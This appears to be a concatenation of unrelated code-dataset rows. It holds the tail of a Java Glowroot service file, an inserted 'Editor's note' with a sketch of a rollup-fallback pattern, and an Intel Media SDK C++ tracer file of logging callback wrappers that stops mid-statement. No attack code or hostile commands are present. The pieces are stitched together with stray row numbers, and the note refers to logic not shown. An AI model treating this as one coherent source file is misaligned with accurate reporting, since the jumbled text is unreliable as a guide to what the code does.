addToStackedTimer(Aggregate.Timer timer, MutableDoubleMap<String> stackedTimers) { double totalNestedNanos = 0; for (Aggregate.Timer childTimer : timer.getChildTimerList()) { totalNestedNanos += childTimer.getTotalNanos(); addToStackedTimer(childTimer, stackedTimers); } String timerName = timer.getName(); stackedTimers.add(timerName, timer.getTotalNanos() - totalNestedNanos); } } // by using MutableDouble, two operations (get/put) are not required for each increment, // instead just a single get is needed (except for first delta) @SuppressWarnings("serial") private static class MutableDoubleMap<K> extends HashMap<K, MutableDouble> { private void add(K key, double delta) { MutableDouble existing = get(key); if (existing == null) { put(key, new MutableDouble(delta)); } else { existing.value += delta; } } } private static class MutableDouble { private double value; private MutableDouble(double value) { this.value = value; } private double doubleValue() { return value; } } @Value.Immutable interface TransactionSummaryRequest { String transactionType(); long from(); long to(); SummarySortOrder sortOrder(); int limit(); } interface RequestBase { String transactionType(); @Nullable String transactionName(); long from(); long to(); } @Value.Immutable interface TransactionDataRequest extends RequestBase {} @Value.Immutable interface TransactionPercentileRequest extends RequestBase { // singular because this is used in query string ImmutableList<Double> percentile(); } @Value.Immutable interface FullQueryTextRequest { String fullTextSha1(); } @Value.Immutable interface TransactionProfileRequest extends RequestBase { boolean auxiliary(); // intentionally not plural since maps from query string ImmutableList<String> include(); // intentionally not plural since maps from query string ImmutableList<String> exclude(); double truncateBranchPercentage(); } @Value.Immutable interface FlameGraphRequest extends RequestBase { boolean auxiliary(); // intentionally not plural since maps from query string ImmutableList<String> 
include(); // intentionally not plural since maps from query string ImmutableList<String> exclude(); double truncateBranchPercentage(); } @Value.Immutable abstract static class TraceFlameGraphRequest { abstract String traceId(); abstract boolean auxiliary(); // intentionally not plural since maps from query string abstract ImmutableList<String> include(); // intentionally not plural since maps from query string abstract ImmutableList<String> exclude(); abstract double truncateBranchPercentage(); @Value.Default boolean checkLiveTraces() { return false; } } @Value.Immutable interface Query { String queryType(); String truncatedQueryText(); @Nullable String fullQueryTextSha1(); double totalDurationNanos(); long executionCount(); @Nullable Long totalRows(); } @Value.Immutable interface ServiceCall { String type(); String text(); double totalDurationNanos(); long executionCount(); } @Value.Immutable interface PercentileData { ImmutableList<DataSeries> dataSeriesList(); PercentileMergedAggregate mergedAggregate(); } @Value.Immutable interface PercentileMergedAggregate { long transactionCount(); // aggregates use double instead of long to avoid (unlikely) 292 year nanosecond rollover double totalDurationNanos(); ImmutableList<PercentileValue> percentileValues(); } }
19,505
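Editor's note: the Glowroot TransactionJsonService row above applies the same guard in every chart and summary endpoint: when a query returns no aggregates and the requested rollup level is not already the largest one, it retries at the largest rollup level (to cope with recently changed expiration settings), and then discards the fallback result if its newest capture time predates the requested window by more than one rollup interval. Below is a minimal, self-contained Java sketch of that pattern only; the AggregateStore interface and the capture-time list it returns are hypothetical stand-ins for illustration, not the real Glowroot repository API.

// Hedged sketch of the "fall back to largest rollup level" pattern.
// AggregateStore and readCaptureTimes() are hypothetical placeholders.
import java.util.Collections;
import java.util.List;

class RollupFallbackSketch {

    interface AggregateStore {
        // returns capture times of aggregates at the given rollup level within [from, to]
        List<Long> readCaptureTimes(int rollupLevel, long from, long to);
    }

    private final AggregateStore store;
    private final long[] rollupIntervalsMillis; // e.g. {60_000, 300_000, 1_800_000, 14_400_000}

    RollupFallbackSketch(AggregateStore store, long[] rollupIntervalsMillis) {
        this.store = store;
        this.rollupIntervalsMillis = rollupIntervalsMillis;
    }

    List<Long> read(int requestedLevel, long from, long to, long nowMillis) {
        List<Long> captureTimes = store.readCaptureTimes(requestedLevel, from, to);
        int largestLevel = rollupIntervalsMillis.length - 1;
        long largestIntervalMillis = rollupIntervalsMillis[largestLevel];
        boolean fallBack = captureTimes.isEmpty()
                && requestedLevel < largestLevel
                // only fall back when the window is old enough to have been rolled up already
                && from < nowMillis - largestIntervalMillis * 2;
        if (fallBack) {
            captureTimes = store.readCaptureTimes(largestLevel, from, to);
            if (!captureTimes.isEmpty()) {
                long lastCaptureTime = captureTimes.get(captureTimes.size() - 1);
                // if even the newest fallback data predates the requested window (plus one
                // rollup interval), it is probably data from before the time period, so drop it
                if (lastCaptureTime < from + largestIntervalMillis) {
                    captureTimes = Collections.emptyList();
                }
            }
        }
        return captureTimes;
    }
}

The thresholds mirror the helper methods in the row above (fallBackToLargestAggregates and ignoreFallBackData); the simplification is that only capture times are returned instead of full aggregate records.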
782
/* ****************************************************************************** *\ Copyright (C) 2012-2020 Intel Corporation. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: - Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. - Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. - Neither the name of Intel Corporation nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. File Name: mfx_video_user.cpp \* ****************************************************************************** */ #include <exception> #include <iostream> #include "../loggers/timer.h" #include "../tracer/functions_table.h" #include "mfx_structures.h" #if TRACE_CALLBACKS mfxStatus mfxCoreInterface_GetCoreParam(mfxHDL _pthis, mfxCoreParam *par) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetCoreParam_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetCoreParam(mfxHDL pthis=" + ToString(pthis) + ", mfxCoreParam* par=" + ToString(par) + ") +"); fmfxCoreInterface_GetCoreParam proc = (fmfxCoreInterface_GetCoreParam)loader->callbacks[emfxCoreInterface_GetCoreParam_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetCoreParam called"); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("callback: mfxCoreInterface::GetCoreParam(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_GetHandle(mfxHDL _pthis, mfxHandleType type, mfxHDL *handle) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetHandle_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetHandle(mfxHDL pthis=" + ToString(pthis) + ", mfxHandleType type=" + ToString(type) + ", mfxHDL *handle=" + ToString(handle) + ") +"); fmfxCoreInterface_GetHandle proc = 
(fmfxCoreInterface_GetHandle)loader->callbacks[emfxCoreInterface_GetHandle_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (handle) Log::WriteLog(context.dump("handle", *handle)); Timer t; mfxStatus status = (*proc) (pthis, type, handle); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetHandle called"); if (handle) Log::WriteLog(context.dump("handle", *handle)); Log::WriteLog("callback: mfxCoreInterface::GetHandle(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_IncreaseReference(mfxHDL _pthis, mfxFrameData *fd) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_IncreaseReference_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::IncreaseReference(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameData *fd=" + ToString(fd) + ") +"); fmfxCoreInterface_IncreaseReference proc = (fmfxCoreInterface_IncreaseReference)loader->callbacks[emfxCoreInterface_IncreaseReference_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (fd) Log::WriteLog(context.dump("fd", *fd)); Timer t; mfxStatus status = (*proc) (pthis, fd); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::IncreaseReference called"); if (fd) Log::WriteLog(context.dump("fd", *fd)); Log::WriteLog("callback: mfxCoreInterface::IncreaseReference(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_DecreaseReference(mfxHDL _pthis, mfxFrameData *fd) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_DecreaseReference_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::DecreaseReference(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameData *fd=" + ToString(fd) + ") +"); fmfxCoreInterface_DecreaseReference proc = (fmfxCoreInterface_DecreaseReference)loader->callbacks[emfxCoreInterface_DecreaseReference_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (fd) Log::WriteLog(context.dump("fd", *fd)); Timer t; mfxStatus status = (*proc) (pthis, fd); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::DecreaseReference called"); if (fd) Log::WriteLog(context.dump("fd", *fd)); Log::WriteLog("callback: mfxCoreInterface::DecreaseReference(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_CopyFrame(mfxHDL _pthis, mfxFrameSurface1 *dst, mfxFrameSurface1 *src) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_CopyFrame_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::CopyFrame(mfxHDL pthis=" + ToString(pthis) + ", 
mfxFrameSurface1 *dst=" + ToString(dst) + ", mfxFrameSurface1 *src=" + ToString(src) + ") +"); fmfxCoreInterface_CopyFrame proc = (fmfxCoreInterface_CopyFrame)loader->callbacks[emfxCoreInterface_CopyFrame_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (dst) Log::WriteLog(context.dump("dst", *dst)); if (src) Log::WriteLog(context.dump("src", *src)); Timer t; mfxStatus status = (*proc) (pthis, dst, src); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::CopyFrame called"); Log::WriteLog("callback: mfxCoreInterface::CopyFrame(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_CopyBuffer(mfxHDL _pthis, mfxU8 *dst, mfxU32 size, mfxFrameSurface1 *src) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_CopyBuffer_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::CopyBuffer(mfxHDL pthis=" + ToString(pthis) + ", mfxU8 *dst=" + ToString(dst) + ", mfxU32 size=" + ToString(size) + ", mfxFrameSurface1 *src=" + ToString(src) + ") +"); fmfxCoreInterface_CopyBuffer proc = (fmfxCoreInterface_CopyBuffer)loader->callbacks[emfxCoreInterface_CopyBuffer_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (src) Log::WriteLog(context.dump("src", *src)); Timer t; mfxStatus status = (*proc) (pthis, dst, size, src); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::CopyBuffer called"); Log::WriteLog("callback: mfxCoreInterface::CopyBuffer(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_MapOpaqueSurface(mfxHDL _pthis, mfxU32 num, mfxU32 type, mfxFrameSurface1 **op_surf) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_MapOpaqueSurface_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::MapOpaqueSurface(mfxHDL pthis=" + ToString(pthis) + ", mfxU32 num=" + ToString(num) + ", mfxU32 type=" + ToString(type) + ", mfxFrameSurface1 **op_surf=" + ToString(op_surf) + ") +"); fmfxCoreInterface_MapOpaqueSurface proc = (fmfxCoreInterface_MapOpaqueSurface)loader->callbacks[emfxCoreInterface_MapOpaqueSurface_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (num && op_surf) for (mfxU32 i = 0; i < num; i++) if (op_surf[i]) Log::WriteLog(context.dump("op_surf[" + ToString(i) + "]=", *op_surf[i])); Timer t; mfxStatus status = (*proc) (pthis, num, type, op_surf); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::MapOpaqueSurface called"); if (num && op_surf) for (mfxU32 i = 0; i < num; i++) if (op_surf[i]) Log::WriteLog(context.dump("op_surf[" + ToString(i) + "]=", *op_surf[i])); Log::WriteLog("callback: mfxCoreInterface::MapOpaqueSurface(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << 
'\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_UnmapOpaqueSurface(mfxHDL _pthis, mfxU32 num, mfxU32 type, mfxFrameSurface1 **op_surf) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_UnmapOpaqueSurface_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::UnmapOpaqueSurface(mfxHDL pthis=" + ToString(pthis) + ", mfxU32 num=" + ToString(num) + ", mfxU32 type=" + ToString(type) + ", mfxFrameSurface1 **op_surf=" + ToString(op_surf) + ") +"); fmfxCoreInterface_UnmapOpaqueSurface proc = (fmfxCoreInterface_UnmapOpaqueSurface)loader->callbacks[emfxCoreInterface_UnmapOpaqueSurface_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (num && op_surf) for (mfxU32 i = 0; i < num; i++) if (op_surf[i]) Log::WriteLog(context.dump("op_surf[" + ToString(i) + "]=", *op_surf[i])); Timer t; mfxStatus status = (*proc) (pthis, num, type, op_surf); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::UnmapOpaqueSurface called"); if (num && op_surf) for (mfxU32 i = 0; i < num; i++) if (op_surf[i]) Log::WriteLog(context.dump("op_surf[" + ToString(i) + "]=", *op_surf[i])); Log::WriteLog("callback: mfxCoreInterface::UnmapOpaqueSurface(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_GetRealSurface(mfxHDL _pthis, mfxFrameSurface1 *op_surf, mfxFrameSurface1 **surf) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetRealSurface_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetRealSurface(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameSurface1 *op_surf=" + ToString(op_surf) + ", mfxFrameSurface1 **surf=" + ToString(surf) + ") +"); fmfxCoreInterface_GetRealSurface proc = (fmfxCoreInterface_GetRealSurface)loader->callbacks[emfxCoreInterface_GetRealSurface_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (op_surf) Log::WriteLog(context.dump("op_surf", *op_surf)); Timer t; mfxStatus status = (*proc) (pthis, op_surf, surf); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetRealSurface called"); if (surf && *surf) Log::WriteLog(context.dump("surf", **surf)); Log::WriteLog("callback: mfxCoreInterface::GetRealSurface(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_GetOpaqueSurface(mfxHDL _pthis, mfxFrameSurface1 *surf, mfxFrameSurface1 **op_surf) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetOpaqueSurface_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetOpaqueSurface(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameSurface1 **surf=" + ToString(surf) + ", mfxFrameSurface1 *op_surf=" + ToString(op_surf) + ") +"); fmfxCoreInterface_GetOpaqueSurface proc = 
(fmfxCoreInterface_GetOpaqueSurface)loader->callbacks[emfxCoreInterface_GetOpaqueSurface_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (surf) Log::WriteLog(context.dump("surf", *surf)); Timer t; mfxStatus status = (*proc) (pthis, surf, op_surf); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetOpaqueSurface called"); if (op_surf && *op_surf) Log::WriteLog(context.dump("op_surf", **op_surf)); Log::WriteLog("callback: mfxCoreInterface::GetOpaqueSurface(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_CreateAccelerationDevice(mfxHDL _pthis, mfxHandleType type, mfxHDL *handle) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_CreateAccelerationDevice_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::CreateAccelerationDevice(mfxHDL pthis=" + ToString(pthis) + ", mfxHandleType type=" + ToString(type) + ", mfxHDL *handle=" + ToString(handle) + ") +"); fmfxCoreInterface_CreateAccelerationDevice proc = (fmfxCoreInterface_CreateAccelerationDevice)loader->callbacks[emfxCoreInterface_CreateAccelerationDevice_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (handle) Log::WriteLog(context.dump("handle", *handle)); Timer t; mfxStatus status = (*proc) (pthis, type, handle); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::CreateAccelerationDevice called"); if (handle) Log::WriteLog(context.dump("handle", *handle)); Log::WriteLog("callback: mfxCoreInterface::CreateAccelerationDevice(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_GetFrameHandle(mfxHDL _pthis, mfxFrameData *fd, mfxHDL *handle) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetFrameHandle_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetFrameHandle(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameData *fd=" + ToString(fd) + ", mfxHDL *handle=" + ToString(handle) + ") +"); fmfxCoreInterface_GetFrameHandle proc = (fmfxCoreInterface_GetFrameHandle)loader->callbacks[emfxCoreInterface_GetFrameHandle_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (fd) Log::WriteLog(context.dump("fd", *fd)); if (handle) Log::WriteLog(context.dump("handle", *handle)); Timer t; mfxStatus status = (*proc) (pthis, fd, handle); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetFrameHandle called"); if (handle) Log::WriteLog(context.dump("handle", *handle)); Log::WriteLog("callback: mfxCoreInterface::GetFrameHandle(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_QueryPlatform(mfxHDL _pthis, mfxPlatform *platform) { try { DumpContext context; 
context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_QueryPlatform_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::QueryPlatform(mfxHDL pthis=" + ToString(pthis) + ", mfxPlatform *platform=" + ToString(platform) + ") +"); fmfxCoreInterface_QueryPlatform proc = (fmfxCoreInterface_QueryPlatform)loader->callbacks[emfxCoreInterface_QueryPlatform_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (platform) Log::WriteLog(context.dump("platform", *platform)); Timer t; mfxStatus status = (*proc) (pthis, platform); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::QueryPlatform called"); if (platform) Log::WriteLog(context.dump("platform", *platform)); Log::WriteLog("callback: mfxCoreInterface::QueryPlatform(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_PluginInit(mfxHDL _pthis, mfxCoreInterface *core) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_PluginInit_tracer][1]; Log::WriteLog("callback: mfxPlugin::PluginInit(mfxHDL pthis=" + ToString(pthis) + ", mfxCoreInterface *core=" + ToString(core) + ") +"); fmfxPlugin_PluginInit proc = (fmfxPlugin_PluginInit)pCtx->callbacks[emfxPlugin_PluginInit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (core) Log::WriteLog(context.dump("core", *core)); Timer t; mfxStatus status = (*proc) (pthis, core); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::PluginInit called"); Log::WriteLog("callback: mfxPlugin::PluginInit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); if (core && status == MFX_ERR_NONE) { INIT_CALLBACK_BACKUP(pCtx->pLoaderBase->callbacks); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., Alloc, core->FrameAllocator.pthis); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., Lock, core->FrameAllocator.pthis); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., Unlock, core->FrameAllocator.pthis); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., GetHDL, core->FrameAllocator.pthis); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., Free, core->FrameAllocator.pthis); if (core->FrameAllocator.pthis) core->FrameAllocator.pthis = pCtx->pLoaderBase; SET_CALLBACK(mfxCoreInterface, core->, GetCoreParam, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, GetHandle, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, IncreaseReference, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, DecreaseReference, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, CopyFrame, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, CopyBuffer, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, MapOpaqueSurface, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, UnmapOpaqueSurface, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, GetRealSurface, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, GetOpaqueSurface, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, CreateAccelerationDevice, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, GetFrameHandle, core->pthis); 
SET_CALLBACK(mfxCoreInterface, core->, QueryPlatform, core->pthis); if (core->pthis) core->pthis = pCtx->pLoaderBase; } return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_PluginClose(mfxHDL _pthis) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_PluginClose_tracer][1]; Log::WriteLog("callback: mfxPlugin::PluginClose(mfxHDL pthis=" + ToString(pthis) + ") +"); fmfxPlugin_PluginClose proc = (fmfxPlugin_PluginClose)pCtx->callbacks[emfxPlugin_PluginClose_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::PluginClose called"); Log::WriteLog("callback: mfxPlugin::PluginClose(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_GetPluginParam(mfxHDL _pthis, mfxPluginParam *par) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_GetPluginParam_tracer][1]; Log::WriteLog("callback: mfxPlugin::GetPluginParam(mfxHDL pthis=" + ToString(pthis) + ", mfxPluginParam *par=" + ToString(par) + ") +"); fmfxPlugin_GetPluginParam proc = (fmfxPlugin_GetPluginParam)pCtx->callbacks[emfxPlugin_GetPluginParam_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::GetPluginParam called"); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("callback: mfxPlugin::GetPluginParam(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_Submit(mfxHDL _pthis, const mfxHDL *in, mfxU32 in_num, const mfxHDL *out, mfxU32 out_num, mfxThreadTask *task) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_Submit_tracer][1]; Log::WriteLog("callback: mfxPlugin::Submit(mfxHDL pthis=" + ToString(pthis) + ", const mfxHDL *in=" + ToString(in) + ", mfxU32 in_num=" + ToString(in_num) + ", const mfxHDL *out=" + ToString(out) + ", mfxU32 out_num=" + ToString(out_num) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxPlugin_Submit proc = 